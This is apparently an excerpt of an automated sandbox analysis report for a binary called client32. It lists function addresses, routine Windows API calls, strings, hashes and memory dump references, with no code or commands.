                                                                                                                                                                • Instruction ID: 49f9b284af19ac66117d03b2e5a1d443c85d81a0ae1d984d16ece0102360dfac
                                                                                                                                                                • Opcode Fuzzy Hash: b2cb9210c48ec020780b730079c096d2d0f15fc37eb5c92fb884244d7da54c06
                                                                                                                                                                • Instruction Fuzzy Hash: 7D314BB1E007159BDB20DF69C844B5BFBE8AB58B14F004A6DE862D3790DB75E504CF91
                                                                                                                                                                Function 110812D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • %02x, xrefs: 11081350
                                                                                                                                                                • ..\CTL32\DataStream.cpp, xrefs: 1108139E
                                                                                                                                                                • m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081387
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf
                                                                                                                                                                • String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
                                                                                                                                                                • API String ID: 2111968516-476189988
                                                                                                                                                                • Opcode ID: 2e0a70d7f48be011b9f6aa9edf4a09ec59e0beebed33c2f057e62bcad71544d0
                                                                                                                                                                • Instruction ID: f12dac7d373f74f5fe212c0395a9fec3f200c40d2e0a4ddded7d9712e57ff33a
                                                                                                                                                                • Opcode Fuzzy Hash: 2e0a70d7f48be011b9f6aa9edf4a09ec59e0beebed33c2f057e62bcad71544d0
                                                                                                                                                                • Instruction Fuzzy Hash: E621A375A052299FD724CF65DCC4EAEB3F8EF44308F0085AEE45A97640D670AD45CB60
                                                                                                                                                                Function 110253D0 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110253E7
                                                                                                                                                                • GetDlgItem.USER32(?,00001399), ref: 11025421
                                                                                                                                                                • TranslateMessage.USER32(?), ref: 1102543A
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 11025444
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025486
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$DispatchItemTranslate
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1381171329-0
                                                                                                                                                                • Opcode ID: bebdcbb2c02c8b11af5fb3a0b68c2766af8923a7f1998c3c6d7298e063844038
                                                                                                                                                                • Instruction ID: 26246af105c186e59b646e9f33a047c98996dcd180a805fce9500a05ed718ca0
                                                                                                                                                                • Opcode Fuzzy Hash: bebdcbb2c02c8b11af5fb3a0b68c2766af8923a7f1998c3c6d7298e063844038
                                                                                                                                                                • Instruction Fuzzy Hash: 7B21CF70F0030A67E718DB72C885BABF7F8AB4430DF804429EA2696180FB75A441CB95
                                                                                                                                                                Function 11023640 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11023657
                                                                                                                                                                • GetDlgItem.USER32(?,00001399), ref: 11023691
                                                                                                                                                                • TranslateMessage.USER32(?), ref: 110236AA
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 110236B4
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110236F6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$DispatchItemTranslate
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1381171329-0
                                                                                                                                                                • Opcode ID: 99f2709280ea8f9ab550b0ea7e65d4d5f08f048117412abd294c30500ebf5fe6
                                                                                                                                                                • Instruction ID: e4fa8043caddc7b5f20a5787ebd9a806815b07058dd3ce68a730809c0d747c41
                                                                                                                                                                • Opcode Fuzzy Hash: 99f2709280ea8f9ab550b0ea7e65d4d5f08f048117412abd294c30500ebf5fe6
                                                                                                                                                                • Instruction Fuzzy Hash: AF218475E0830A5BE728DB71CC89F6BB7FCBB48708F804469EA1696680F774E445CB91
                                                                                                                                                                Function 110B3480 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(0000002C,?,?,00000000,?,11042D0F,?,?,?), ref: 110B348F
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,00000000,?,11042D0F,?,?,?), ref: 110B34AE
                                                                                                                                                                • GetSystemMetrics.USER32(0000004C), ref: 110B34D7
                                                                                                                                                                • GetSystemMetrics.USER32(0000004D), ref: 110B34DD
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,11042D0F,?,?,?), ref: 110B350B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$LeaveMetricsSystem$Enter
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4125181052-0
                                                                                                                                                                • Opcode ID: 6e827b865e112c236f8062b7a01fa85b3c230ff9b8f5b84ba316de4fb96b13dc
                                                                                                                                                                • Instruction ID: 801bd15c3d0154c41976e2eaa61373d34deab0fe063badba9a51cb8e6142ad09
                                                                                                                                                                • Opcode Fuzzy Hash: 6e827b865e112c236f8062b7a01fa85b3c230ff9b8f5b84ba316de4fb96b13dc
                                                                                                                                                                • Instruction Fuzzy Hash: A8115172600608DFD715CF79C8849AAFBE9FF98314B20C66ED51AC7214DB76E806CB90
                                                                                                                                                                Function 11037420 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetDlgItemTextA.USER32(?,?,?), ref: 1103745C
                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 1103747B
                                                                                                                                                                • EnableWindow.USER32(00000000), ref: 1103747E
                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 1103748B
                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 1103748E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Item$Window$EnableShowText
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2998856390-0
                                                                                                                                                                • Opcode ID: a3dd57f40e811cb056004758dced00ebceee77a15d7cbd7a2f2e689cf73dd52f
                                                                                                                                                                • Instruction ID: 57c7ddd847a5478456caef720018e145f44b1abd5c3db2a1ec897eab876666b4
                                                                                                                                                                • Opcode Fuzzy Hash: a3dd57f40e811cb056004758dced00ebceee77a15d7cbd7a2f2e689cf73dd52f
                                                                                                                                                                • Instruction Fuzzy Hash: A701B57961021ABFE7049B35DC88DA7BBADEF85769B04C510FE288B204DB31F91087A0
                                                                                                                                                                Function 110916D0 Relevance: 7.6, APIs: 5, Instructions: 54windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110916EA
                                                                                                                                                                  • Part of subcall function 110CD550: EnterCriticalSection.KERNEL32(00000000,00000000,76963760,00000000,7697A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
                                                                                                                                                                  • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
                                                                                                                                                                  • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
                                                                                                                                                                  • Part of subcall function 110CD550: LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4
                                                                                                                                                                • TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093120,?,00000000,?,00000000), ref: 11091717
                                                                                                                                                                • TranslateMessage.USER32(?), ref: 11091721
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 1109172B
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1109173B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$CriticalSectionSendTranslate$AcceleratorDispatchEnterLeave
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 754905447-0
                                                                                                                                                                • Opcode ID: 8836f3c147edcf9cdfb691bbcbb4f4f5b5b89b5fe7a68676181438dadcff888a
                                                                                                                                                                • Instruction ID: ce8fbc9ac9b0b1bd813cbad70a92dc9222b6ce5bbcd458d30cafe135b1b85486
                                                                                                                                                                • Opcode Fuzzy Hash: 8836f3c147edcf9cdfb691bbcbb4f4f5b5b89b5fe7a68676181438dadcff888a
                                                                                                                                                                • Instruction Fuzzy Hash: D6019272F0030F67D714DAB59C95FAFF3BCAB44714F404568E624D6184E774E4068760
                                                                                                                                                                Function 110B3400 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(0000002C,?,?,?,11045FFC,?,00000001), ref: 110B340B
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,?,11045FFC,?,00000001), ref: 110B342E
                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,?,11045FFC,?,00000001), ref: 110B344A
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,?,11045FFC,?,00000001), ref: 110B3451
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,?,11045FFC,?,00000001), ref: 110B3467
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3394196147-0
                                                                                                                                                                • Opcode ID: 8c715f06f450df2ea172f98b616e3d2526d901906a044e0056aef2e33b335bca
                                                                                                                                                                • Instruction ID: e5f8ef3327ba4f1519da81c03456daf7aec4ee946496b7062d443b07b9ce6233
                                                                                                                                                                • Opcode Fuzzy Hash: 8c715f06f450df2ea172f98b616e3d2526d901906a044e0056aef2e33b335bca
                                                                                                                                                                • Instruction Fuzzy Hash: 9601D6321142149FE3219AA9D884BDBFBE8FBAD325F00442BF49AC6500D7B9F446CB61
                                                                                                                                                                Function 110F34D0 Relevance: 7.5, APIs: 5, Instructions: 45pipesleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetNamedPipeHandleState.KERNEL32(00000000,?,00000000,00000000,?,?,?,110F5AA9), ref: 110F34E5
                                                                                                                                                                • ConnectNamedPipe.KERNEL32(00000000,00000000,?,?,110F5AA9), ref: 110F34FA
                                                                                                                                                                • GetLastError.KERNEL32(?,?,110F5AA9), ref: 110F3500
                                                                                                                                                                • Sleep.KERNEL32(00000064,?,?,110F5AA9), ref: 110F350F
                                                                                                                                                                • SetNamedPipeHandleState.KERNEL32(00000000,00000003,00000000,00000000,?,?,110F5AA9), ref: 110F3532
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: NamedPipe$HandleState$ConnectErrorLastSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 218362120-0
                                                                                                                                                                • Opcode ID: 4c47c1bcaee6423ede5432822239bb6bc816e402af8a3d276d6bb81ff69d9390
                                                                                                                                                                • Instruction ID: 21f70c1f85d7eb0c658cdb8f41c885585f7637e52573ebcef80a1ea4a19d6ab0
                                                                                                                                                                • Opcode Fuzzy Hash: 4c47c1bcaee6423ede5432822239bb6bc816e402af8a3d276d6bb81ff69d9390
                                                                                                                                                                • Instruction Fuzzy Hash: 4D01A93465821AABF704CBA4CC8ABAAF7ACEB48714F504069FD15D7180D7719D008761
                                                                                                                                                                Function 11021300 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf$VisibleWindow
                                                                                                                                                                • String ID: %d,%d,%d,%d,%d,%d
                                                                                                                                                                • API String ID: 1671172596-1913222166
                                                                                                                                                                • Opcode ID: d53aa28a4ccfb8e13cf20ea598e1f96ded17236a1d9ba3be30e792c9697d6fb3
